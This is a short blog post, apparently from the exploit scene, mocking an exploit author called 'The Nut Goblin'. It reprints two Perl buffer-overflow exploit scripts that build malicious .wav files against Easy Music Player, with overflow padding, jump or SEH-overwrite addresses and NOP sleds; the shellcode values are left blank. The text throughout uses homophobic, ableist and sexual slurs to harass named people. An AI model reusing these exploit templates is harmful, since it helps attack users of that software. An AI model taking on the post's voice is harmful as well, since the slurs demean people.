The Nut Goblin (ThE g0bL!N) has to be the most retarded of the retards we've fucked with on this blog. He is very stupid. Some say he has a negative IQ. Some say he (or she?? once again) has nuts on his/her forehead at all times. But all know what a dumb mother fucking idiot The Nut Goblin really is.
Exhibit A-Z:
A perfectly normal exploit.. almost ruined!
# by ahwak2000
# email: 0.w[at]
# Easy Music Player (wav) Universal Local Buffer Exploit (SEH)
my $shellcode=
my $overflow="\x41" x 4128;
my $jmp="\x6F\xBA\x2D\x15";# Universal
my $nop="\x90" x 20;
open(myfile,'>> ahwak2000.wav');
print myfile $overflow.$jmp.$nop.$shellcode;
Perfectly fine. JMP to mother fucking code. Now, The cum gobliner has to gay it all up with...
# by ThE g0bL!N
#Big thnx: His0k4
#easy Music Player local Buffer Overflow Exploit (SEH)
my $bof="\x41" x 4132;
my $nsh="\xEB\x06\x90\x90";
my $seh="\xB8\x15\xC6\x72";
my $nop="\x90" x 20;
my $sec=
print $bof.$nsh.$seh.$nop.$sec;
open(myfile,'>> dz.wav');
print myfile $bof.$nsh.$seh.$nop.$sec;
Even the fags at milw0rm got it wrong...
"Easy Music Player (wav) Universal Local Buffer Exploit (SEH)" --> ITS NOT SEH FUCKUP.
You see a fucking JMP 0xXX anywhere? Debug something every once in a fucking blue moon moron.
So, milw0rm is dumb and the goblin gobbles str0ke's nuts, and they both claim it as SEH we assume ahahahahahahaahhahaa!!!!